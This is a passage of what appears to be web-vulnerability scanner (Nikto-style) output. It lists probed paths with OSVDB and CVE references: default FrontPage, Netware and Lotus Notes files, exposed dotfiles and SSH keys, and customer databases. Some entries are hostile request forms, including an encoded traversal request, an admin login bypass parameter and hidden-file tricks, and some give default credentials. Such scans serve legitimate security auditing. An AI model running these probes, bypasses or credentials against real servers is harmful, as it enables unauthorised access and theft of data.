  301. + OSVDB-3093: /spelling.php3+: This might be interesting... has been seen in web logs from an unknown scanner.
  302. + OSVDB-3093: /squirrelmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
  303. + OSVDB-3093: /staticpages/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  304. + OSVDB-3093: /status.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  305. + OSVDB-3093: /supporter/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  306. + OSVDB-3093: /supporter/tupdate.php: This might be interesting... has been seen in web logs from an unknown scanner.
  307. + OSVDB-3093: /sw000.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
  308. + OSVDB-3093: /syslog.htm?%20: This might be interesting... has been seen in web logs from an unknown scanner.
  309. + OSVDB-3093: /technote/print.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
  310. + OSVDB-3093: /texis/websearch/phine: This might be interesting... has been seen in web logs from an unknown scanner.
  311. + OSVDB-3093: /tinymsg.php: This might be interesting... has been seen in web logs from an unknown scanner.
  312. + OSVDB-3093: /topic/entete.php: This might be interesting... has been seen in web logs from an unknown scanner.
  313. + OSVDB-3093: /topsitesdir/edit.php: This might be interesting... has been seen in web logs from an unknown scanner.
  314. + OSVDB-3093: /ttforum/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  315. + OSVDB-3093: /tutos/file/file_new.php: This might be interesting... has been seen in web logs from an unknown scanner.
  316. + OSVDB-3093: /tutos/file/file_select.php: This might be interesting... has been seen in web logs from an unknown scanner.
  317. + OSVDB-3093: /typo3/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
  318. + OSVDB-3093: /uifc/MultFileUploadHandler.php+: This might be interesting... has been seen in web logs from an unknown scanner.
  319. + OSVDB-3093: /url.jsp: This might be interesting... has been seen in web logs from an unknown scanner.
  320. + OSVDB-3093: /useraction.php3: This might be interesting... has been seen in web logs from an unknown scanner.
  321. + OSVDB-3093: /utils/sprc.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
  322. + OSVDB-3093: /vars.inc+: This might be interesting... has been seen in web logs from an unknown scanner.
  323. + OSVDB-3093: /VBZooM/add-subject.php: This might be interesting... has been seen in web logs from an unknown scanner.
  324. + OSVDB-3093: /wbboard/profile.php: This might be interesting... has been seen in web logs from an unknown scanner.
  325. + OSVDB-3093: /wbboard/reply.php: This might be interesting... has been seen in web logs from an unknown scanner.
  326. + OSVDB-3093: /webcalendar/login.php: This might be interesting... has been seen in web logs from an unknown scanner.
  327. + OSVDB-3093: /webcalendar/view_m.php: This might be interesting... has been seen in web logs from an unknown scanner.
  328. + OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
  329. + OSVDB-3093: /webmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
  330. + OSVDB-3093: /web_app/WEB-INF/webapp.properties: This might be interesting... has been seen in web logs from an unknown scanner.
  331. + OSVDB-3093: /XMBforum/buddy.php: This might be interesting... has been seen in web logs from an unknown scanner.
  332. + OSVDB-3093: /XMBforum/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
  333. + OSVDB-3093: /x_stat_admin.php: This might be interesting... has been seen in web logs from an unknown scanner.
  334. + OSVDB-3093: /yabbse/Reminder.php: This might be interesting... has been seen in web logs from an unknown scanner.
  335. + OSVDB-3093: /yabbse/Sources/Packages.php: This might be interesting... has been seen in web logs from an unknown scanner.
  336. + OSVDB-3093: /zentrack/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  337. + OSVDB-3093: /_head.php: This might be interesting... has been seen in web logs from an unknown scanner.
  338. + OSVDB-3093: /ows-bin/oaskill.exe?abcde.exe: This might be interesting... has been seen in web logs from an unknown scanner.
  339. + OSVDB-3093: /ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah: This might be interesting... has been seen in web logs from an unknown scanner.
  340. + OSVDB-3093: /database/: Databases? Really??
  341. + OSVDB-3093: /.wwwacl: Contains authorization information
  342. + OSVDB-3093: /.www_acl: Contains authorization information
  343. + OSVDB-3093: /.htpasswd: Contains authorization information
  344. + OSVDB-3093: /.access: Contains authorization information
  345. + OSVDB-3093: /.addressbook: PINE addressbook, may store sensitive e-mail address contact information and notes
  346. + OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
  347. + OSVDB-3093: /.bash_history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.
  348. + OSVDB-3093: /.forward: User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to.
  349. + OSVDB-3093: /.history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.
  350. + OSVDB-3093: /.htaccess: Contains authorization information
  351. + OSVDB-3093: /.lynx_cookies: User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites.
  352. + OSVDB-3093: /.mysql_history: Database SQL?
  353. + OSVDB-3093: /.passwd: Contains authorization information
  354. + OSVDB-3093: /.pinerc: User home dir found with a PINE rc file. May reveal system information, directories and more.
  355. + OSVDB-3093: /.plan: User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol
  356. + OSVDB-3093: /.proclog: User home dir with a Procmail log file. May reveal user mail traffic, directories and more.
  357. + OSVDB-3093: /.procmailrc: User home dir with a Procmail rc file. May reveal sub directories, mail contacts and more.
  358. + OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
  359. + OSVDB-3093: /.rhosts: A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web.
  360. + OSVDB-3093: /.sh_history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.
  361. + OSVDB-3093: /.ssh: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
  362. + OSVDB-3093: /.ssh/authorized_keys: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
  363. + OSVDB-3093: /.ssh/known_hosts: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
  364. + OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
  365. + OSVDB-3233: /jservdocs/: Default Apache JServ docs should be removed.
  366. + OSVDB-3233: /tomcat-docs/index.html: Default Apache Tomcat documentation found.
  367. + OSVDB-3233: /akopia/: Akopia is installed.
  368. + OSVDB-3233: /ojspdemos/basic/hellouser/hellouser.jsp: Oracle 9i default jsp page found, may be vulnerable to XSS in any field.
  369. + OSVDB-3233: /ojspdemos/basic/simple/usebean.jsp: Oracle 9i default jsp page found, may be vulnerable to XSS in any field.
  370. + OSVDB-3233: /ojspdemos/basic/simple/welcomeuser.jsp: Oracle 9i default jsp page found, may be vulnerable to XSS in any field.
  371. + OSVDB-3233: /php/index.php: Monkey Http Daemon default php file found.
  372. + OSVDB-3233: /servlet/Counter: JRun default servlet found. All default code should be removed from servers.
  373. + OSVDB-3233: /servlet/DateServlet: JRun default servlet found. All default code should be removed from servers.
  374. + OSVDB-3233: /servlet/FingerServlet: JRun default servlet found. All default code should be removed from servers.
  375. + OSVDB-3233: /servlet/HelloWorldServlet: JRun default servlet found. All default code should be removed from servers.
  376. + OSVDB-3233: /servlet/SessionServlet: JRun or Netware WebSphere default servlet found. All default code should be removed from servers.
  377. + OSVDB-3233: /servlet/SimpleServlet: JRun default servlet found (possibly Websphere). All default code should be removed from servers.
  378. + OSVDB-3233: /servlet/SnoopServlet: JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.
  379. + OSVDB-3233: /admcgi/contents.htm: Default FrontPage CGI found.
  380. + OSVDB-3233: /admcgi/scripts/Fpadmcgi.exe: Default FrontPage CGI found.
  381. + OSVDB-3233: /admisapi/fpadmin.htm: Default FrontPage file found.
  382. + OSVDB-3233: /bin/admin.pl: Default FrontPage CGI found.
  383. + OSVDB-3233: /bin/cfgwiz.exe: Default FrontPage CGI found.
  384. + OSVDB-3233: /bin/CGImail.exe: Default FrontPage CGI found.
  385. + OSVDB-3233: /bin/contents.htm: Default FrontPage CGI found.
  386. + OSVDB-3233: /bin/fpadmin.htm: Default FrontPage CGI found.
  387. + OSVDB-3233: /bin/fpremadm.exe: Default FrontPage CGI found.
  388. + OSVDB-3233: /bin/fpsrvadm.exe: Default FrontPage CGI found.
  389. + OSVDB-3233: /cgi-bin/admin.pl: Default FrontPage CGI found.
  390. + OSVDB-3233: /cgi-bin/cfgwiz.exe: Default FrontPage CGI found.
  391. + OSVDB-3233: /cgi-bin/CGImail.exe: Default FrontPage CGI found.
  392. + OSVDB-3233: /cgi-bin/contents.htm: Default FrontPage CGI found.
  393. + OSVDB-3233: /cgi-bin/fpadmin.htm: Default FrontPage CGI found.
  394. + OSVDB-3233: /cgi-bin/fpremadm.exe: Default FrontPage CGI found.
  395. + OSVDB-3233: /cgi-bin/fpsrvadm.exe: Default FrontPage CGI found.
  396. + OSVDB-3233: /scripts/admin.pl: Default FrontPage CGI found.
  397. + OSVDB-3233: /scripts/cfgwiz.exe: Default FrontPage CGI found.
  398. + OSVDB-3233: /scripts/CGImail.exe: Default FrontPage CGI found.
  399. + OSVDB-3233: /scripts/contents.htm: Default FrontPage CGI found.
  400. + OSVDB-3233: /scripts/fpadmin.htm: Default FrontPage CGI found.
  401. + OSVDB-3233: /scripts/fpcount.exe: Default FrontPage CGI found.
  402. + OSVDB-3233: /scripts/fpremadm.exe: Default FrontPage CGI found.
  403. + OSVDB-3233: /scripts/fpsrvadm.exe: Default FrontPage CGI found.
  404. + OSVDB-3233: /_private/: FrontPage directory found.
  405. + OSVDB-3233: /_private/orders.htm: Default FrontPage file found.
  406. + OSVDB-3233: /_private/orders.txt: Default FrontPage file found.
  407. + OSVDB-3233: /_private/register.htm: Default FrontPage file found.
  408. + OSVDB-3233: /_private/register.txt: Default FrontPage file found.
  409. + OSVDB-3233: /_private/registrations.txt: Default FrontPage file found.
  410. + OSVDB-3233: /_private/_vti_cnf/: FrontPage directory found.
  411. + OSVDB-3233: /_vti_bin/: FrontPage directory found.
  412. + OSVDB-3233: /_vti_bin/admin.pl: Default FrontPage CGI found.
  413. + OSVDB-3233: /_vti_bin/cfgwiz.exe: Default FrontPage CGI found.
  414. + OSVDB-3233: /_vti_bin/CGImail.exe: Default FrontPage CGI found.
  415. + OSVDB-3233: /_vti_bin/contents.htm: Default FrontPage CGI found.
  416. + OSVDB-3233: /_vti_bin/fpadmin.htm: Default FrontPage CGI found.
  417. + OSVDB-3233: /_vti_bin/fpremadm.exe: Default FrontPage CGI found.
  418. + OSVDB-3233: /_vti_bin/fpsrvadm.exe: Default FrontPage CGI found.
  419. + OSVDB-3233: /_vti_bin/_vti_cnf/: FrontPage directory found.
  420. + OSVDB-3233: /_vti_cnf/_vti_cnf/: FrontPage directory found.
  421. + OSVDB-3233: /_vti_log/_vti_cnf/: FrontPage directory found.
  422. + OSVDB-3233: /_vti_pvt/administrators.pwd: Default FrontPage file found, may be a password file.
  423. + OSVDB-3233: /_vti_pvt/authors.pwd: Default FrontPage file found, may be a password file.
  424. + OSVDB-3233: /_vti_pvt/service.pwd: Default FrontPage file found, may be a password file.
  425. + OSVDB-3233: /_vti_pvt/users.pwd: Default FrontPage file found, may be a password file.
  426. + OSVDB-3233: /help/contents.htm: Default Netscape manual found. All default pages should be removed.
  427. + OSVDB-3233: /help/home.html: Default Netscape manual found. All default pages should be removed.
  428. + OSVDB-3233: /manual/ag/esperfrm.htm: Default Netscape manual found. All default pages should be removed.
  429. + OSVDB-3233: /nethome/: Netscape Enterprise Server default doc/manual directory. Reveals server path at bottom of page.
  430. + OSVDB-3233: /com/novell/gwmonitor/help/en/default.htm: Netware gateway monitor access documentation found. All default documentation should be removed from web servers.
  431. + OSVDB-3233: /com/novell/webaccess/help/en/default.htm: Netware web access documentation found. All default documentation should be removed from web servers.
  432. + OSVDB-3233: /com/novell/webpublisher/help/en/default.htm: Netware web publisher documentation found. All default documentation should be removed from web servers.
  433. + OSVDB-3233: /servlet/AdminServlet: Netware Web Search Server (adminservlet) found. All default code should be removed from web servers.
  434. + OSVDB-3233: /servlet/gwmonitor: Netware Gateway monitor found. All default code should be removed from web servers.
  435. + OSVDB-3233: /servlet/PrintServlet: Novell Netware default servlet found. All default code should be removed from the system.
  436. + OSVDB-3233: /servlet/SearchServlet: Novell Netware default servlet found. All default code should be removed from the system.
  437. + OSVDB-3233: /servlet/ServletManager: Netware Java Servlet Gateway found. Default user id is servlet, default password is manager. All default code should be removed from Internet servers.
  438. + OSVDB-3233: /servlet/sq1cdsn: Novell Netware default servlet found. All default code should be removed from the system.
  439. + OSVDB-3233: /servlet/sqlcdsn: Netware SQL connector found. All default code should be removed from web servers.
  440. + OSVDB-3233: /servlet/webacc: Netware Enterprise and/or GroupWise web access found. All default code should be removed from Internet servers.
  441. + OSVDB-3233: /servlet/webpub: Netware Web Publisher found. All default code should be removed from web servers.
  442. + OSVDB-3233: /WebSphereSamples: Netware Webshere sample applications found. All default code should be removed from web servers.
  443. + OSVDB-3233: /cgi-bin/cgi-test.exe: Default CGI found
  444. + OSVDB-3233: /doc/domguide.nsf: This documentation database can be read without authentication. All default files should be removed.
  445. + OSVDB-3233: /doc/dspug.nsf: This documentation database can be read without authentication. All default files should be removed.
  446. + OSVDB-3233: /doc/help4.nsf: This documentation database can be read without authentication. All default files should be removed.
  447. + OSVDB-3233: /doc/helpadmin.nsf: This documentation database can be read without authentication. All default files should be removed.
  448. + OSVDB-3233: /doc/helplt4.nsf: This documentation database can be read without authentication. All default files should be removed.
  449. + OSVDB-3233: /doc/internet.nsf: This documentation database can be read without authentication. All default files should be removed.
  450. + OSVDB-3233: /doc/javapg.nsf: This documentation database can be read without authentication. All default files should be removed.
  451. + OSVDB-3233: /doc/lccon.nsf: This documentation database can be read without authentication. All default files should be removed.
  452. + OSVDB-3233: /doc/migrate.nsf: This documentation database can be read without authentication. All default files should be removed.
  453. + OSVDB-3233: /doc/npn_admn.nsf: This documentation database can be read without authentication. All default files should be removed.
  454. + OSVDB-3233: /doc/npn_rn.nsf: This documentation database can be read without authentication. All default files should be removed.
  455. + OSVDB-3233: /doc/readmec.nsf: This documentation database can be read without authentication. All default files should be removed.
  456. + OSVDB-3233: /doc/readmes.nsf: This documentation database can be read without authentication. All default files should be removed.
  457. + OSVDB-3233: /doc/smhelp.nsf: This documentation database can be read without authentication. All default files should be removed.
  458. + OSVDB-3233: /doc/srvinst.nsf: This documentation database can be read without authentication. All default files should be removed.
  459. + OSVDB-3233: /domguide.nsf: This documentation database can be read without authentication. All default files should be removed.
  460. + OSVDB-3233: /dspug.nsf: This documentation database can be read without authentication. All default files should be removed.
  461. + OSVDB-3233: /help/domguide.nsf: This documentation database can be read without authentication. All default files should be removed.
  462. + OSVDB-3233: /help/dspug.nsf: This documentation database can be read without authentication. All default files should be removed.
  463. + OSVDB-3233: /help/help4.nsf: This documentation database can be read without authentication. All default files should be removed.
  464. + OSVDB-3233: /help/helpadmin.nsf: This documentation database can be read without authentication. All default files should be removed.
  465. + OSVDB-3233: /help/helplt4.nsf: This documentation database can be read without authentication. All default files should be removed.
  466. + OSVDB-3233: /help/internet.nsf: This documentation database can be read without authentication. All default files should be removed.
  467. + OSVDB-3233: /help/javapg.nsf: This documentation database can be read without authentication. All default files should be removed.
  468. + OSVDB-3233: /help/lccon.nsf: This documentation database can be read without authentication. All default files should be removed.
  469. + OSVDB-3233: /help/migrate.nsf: This documentation database can be read without authentication. All default files should be removed.
  470. + OSVDB-3233: /help/npn_admn.nsf: This documentation database can be read without authentication. All default files should be removed.
  471. + OSVDB-3233: /help/npn_rn.nsf: This documentation database can be read without authentication. All default files should be removed.
  472. + OSVDB-3233: /help/readmec.nsf: This documentation database can be read without authentication. All default files should be removed.
  473. + OSVDB-3233: /help/readmes.nsf: This documentation database can be read without authentication. All default files should be removed.
  474. + OSVDB-3233: /help/smhelp.nsf: This documentation database can be read without authentication. All default files should be removed.
  475. + OSVDB-3233: /help/srvinst.nsf: This documentation database can be read without authentication. All default files should be removed.
  476. + OSVDB-3233: /help4.nsf: This documentation database can be read without authentication. All default files should be removed.
  477. + OSVDB-3233: /helpadmin.nsf: This documentation database can be read without authentication. All default files should be removed.
  478. + OSVDB-3233: /helplt4.nsf: This documentation database can be read without authentication. All default files should be removed.
  479. + OSVDB-3233: /internet.nsf: This documentation database can be read without authentication. All default files should be removed.
  480. + OSVDB-3233: /javapg.nsf: This documentation database can be read without authentication. All default files should be removed.
  481. + OSVDB-3233: /lccon.nsf: This documentation database can be read without authentication. All default files should be removed.
  482. + OSVDB-3233: /migrate.nsf: This documentation database can be read without authentication. All default files should be removed.
  483. + OSVDB-3233: /npn_admn.nsf: This documentation database can be read without authentication. All default files should be removed.
  484. + OSVDB-3233: /npn_rn.nsf: This documentation database can be read without authentication. All default files should be removed.
  485. + OSVDB-3233: /readmec.nsf: This documentation database can be read without authentication. All default files should be removed.
  486. + OSVDB-3233: /readmes.nsf: This documentation database can be read without authentication. All default files should be removed.
  487. + OSVDB-3233: /smhelp.nsf: This documentation database can be read without authentication. All default files should be removed.
  488. + OSVDB-3233: /srvinst.nsf: This documentation database can be read without authentication. All default files should be removed.
  489. + OSVDB-3233: /index.html.ca: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  490. + OSVDB-3233: /index.html.cz.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  491. + OSVDB-3233: /index.html.de: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  492. + OSVDB-3233: /index.html.dk: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  493. + OSVDB-3233: /index.html.ee: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  494. + OSVDB-3233: /index.html.el: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  495. + OSVDB-3233: /index.html.en: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  496. + OSVDB-3233: /index.html.es: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  497. + OSVDB-3233: /index.html.et: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  498. + OSVDB-3233: /index.html.fr: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  499. + OSVDB-3233: /index.html.he.iso8859-8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  500. + OSVDB-3233: /index.html.hr.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  501. + OSVDB-3233: /index.html.it: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  502. + OSVDB-3233: /index.html.ja.iso2022-jp: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  503. + OSVDB-3233: /index.html.kr.iso2022-kr: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  504. + OSVDB-3233: /index.html.ltz.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  505. + OSVDB-3233: /index.html.lu.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  506. + OSVDB-3233: /index.html.nl: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  507. + OSVDB-3233: /index.html.nn: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  508. + OSVDB-3233: /index.html.no: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  509. + OSVDB-3233: /index.html.po.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  510. + OSVDB-3233: /index.html.pt: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  511. + OSVDB-3233: /index.html.pt-br: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  512. + OSVDB-3233: /index.html.ru.cp-1251: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  513. + OSVDB-3233: /index.html.ru.cp866: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  514. + OSVDB-3233: /index.html.ru.iso-ru: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  515. + OSVDB-3233: /index.html.ru.koi8-r: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  516. + OSVDB-3233: /index.html.ru.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  517. + OSVDB-3233: /index.html.se: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  518. + OSVDB-3233: /index.html.tw: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  519. + OSVDB-3233: /index.html.tw.Big5: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  520. + OSVDB-3233: /index.html.var: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
  521. + OSVDB-3233: /iissamples/sdk/asp/docs/codebrw2.asp: This is a default IIS script/file which should be removed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0739. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  522. + OSVDB-3233: /iissamples/sdk/asp/docs/codebrws.asp: This is a default IIS script/file which should be removed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0739. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  523. + OSVDB-3233: /iissamples/sdk/asp/docs/Winmsdp.exe: This is a default IIS script/file which should be removed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0738. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  524. + OSVDB-3233: /a/: May be Kebi Web Mail administration menu.
  525. + OSVDB-3233: /basilix/: BasiliX webmail application. Default mysql database name is 'BASILIX' with password 'bsxpass'
  526. + OSVDB-3233: /interchange/: Interchange chat is installed. Look for a high-numbered port like 20xx to find it running.
  527. + OSVDB-3268: /icons/: Directory indexing is enabled: /icons
  528. + OSVDB-3268: /manual/images/: Directory indexing is enabled: /manual/images
  529. + OSVDB-3268: /docs/: Directory indexing is enabled: /docs
  530. + OSVDB-3282: /uploader.php: This script may allow arbitrary files to be uploaded to the remote server.
  531. + OSVDB-3284: /iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp: IIS may be vulnerable to source code viewing via the example Winmsdp.exe file. Remove all default files from the web root. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0738. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  532. + OSVDB-3286: /conspass.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1081
  533. + OSVDB-3286: /consport.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1081
  534. + OSVDB-3286: /general.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1081
  535. + OSVDB-3286: /srvstatus.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1081
  536. + OSVDB-3396: /mlog.html: Remote file read vulnerability 1999-0068
  537. + OSVDB-3396: /mlog.phtml: Remote file read vulnerability 1999-0068
  538. + OSVDB-3396: /php/mlog.html: Remote file read vulnerability 1999-0346
  539. + OSVDB-3396: /php/mlog.phtml: Remote file read vulnerability 1999-0346
  540. + OSVDB-3411: /soapConfig.xml: Oracle 9iAS configuration file found - see bugrtraq #4290.
  541. + OSVDB-3423: /XSQLConfig.xml: Oracle 9iAS configuration file found - see bugrtraq #4290.
  542. + OSVDB-3489: /surf/scwebusers: SurfControl SuperScout Web Reports Server user and password file is available. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0705.
  543. + OSVDB-3501: /_private/form_results.htm: This file may contain information submitted by other web users via forms. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1052.
  544. + OSVDB-3501: /_private/form_results.html: This file may contain information submitted by other web users via forms. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1052.
  545. + OSVDB-3501: /_private/form_results.txt: This file may contain information submitted by other web users via forms. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1052.
  546. + OSVDB-3512: /scripts/tools/getdrvrs.exe: MS Jet database engine can be used to make DSNs, useful with an ODBC exploit and the RDS exploit (with msadcs.dll) which mail allow command execution. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm).
  547. + OSVDB-3591: /project/index.php?m=projects&user_cookie=1: dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL.
  548. + OSVDB-379: /site/eg/source.asp: This asp (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0628.
  549. + OSVDB-4: /iissamples/exair/search/advsearch.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
  550. + OSVDB-4013: /isqlplus: Oracle iSQL*Plus is installed. This may be vulnerable to a buffer overflow in the user id field. http://www.ngssoftware.com/advisories/ora-isqlplus.txt
  551. + OSVDB-4161: /data/member_log.txt: Teekai's forum full 1.2 member's log can be retrieved remotely.
  552. + OSVDB-4161: /data/userlog/log.txt: Teekai's Tracking Online 1.0 log can be retrieved remotely.
  553. + OSVDB-4161: /userlog.php: Teekai's Tracking Online 1.0 log can be retrieved remotely.
  554. + OSVDB-4171: /ASP/cart/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  555. + OSVDB-4171: /database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  556. + OSVDB-4171: /mcartfree/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  557. + OSVDB-4171: /metacart/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  558. + OSVDB-4171: /shop/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  559. + OSVDB-4171: /shoponline/fpdb/shop.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  560. + OSVDB-4171: /shopping/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  561. + OSVDB-4237: /ban.bak: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
  562. + OSVDB-4237: /ban.dat: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
  563. + OSVDB-4237: /ban.log: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
  564. + OSVDB-4237: /banmat.pwd: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
  565. + OSVDB-4238: /admin/adminproc.asp: Xpede administration page may be available. The /admin directory should be protected.
  566. + OSVDB-4239: /admin/datasource.asp: Xpede page reveals SQL account name. The /admin directory should be protected.
  567. + OSVDB-4240: /utils/sprc.asp: Xpede page may allow SQL injection.
  568. + OSVDB-4314: /texis.exe/?-dump: Texis installation may reveal sensitive information.
  569. + OSVDB-4314: /texis.exe/?-version: Texis installation may reveal sensitive information.
  570. + OSVDB-4360: /acart2_0/acart2_0.mdb: Alan Ward A-Cart 2.0 allows remote user to read customer database file which may contain usernames, passwords, credit cards and more.
  571. + OSVDB-4361: /acart2_0/admin/category.asp: Alan Ward A-Cart 2.0 is vulnerable to an XSS attack which may cause the administrator to delete database information.
  572. + OSVDB-474: /Sites/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  573. + OSVDB-474: /Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  574. + OSVDB-474: /Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  575. + OSVDB-474: /Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  576. + OSVDB-474: /Sites/Samples/Knowledge/Push/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  577. + OSVDB-474: /Sites/Samples/Knowledge/Search/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  578. + OSVDB-474: /SiteServer/Publishing/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
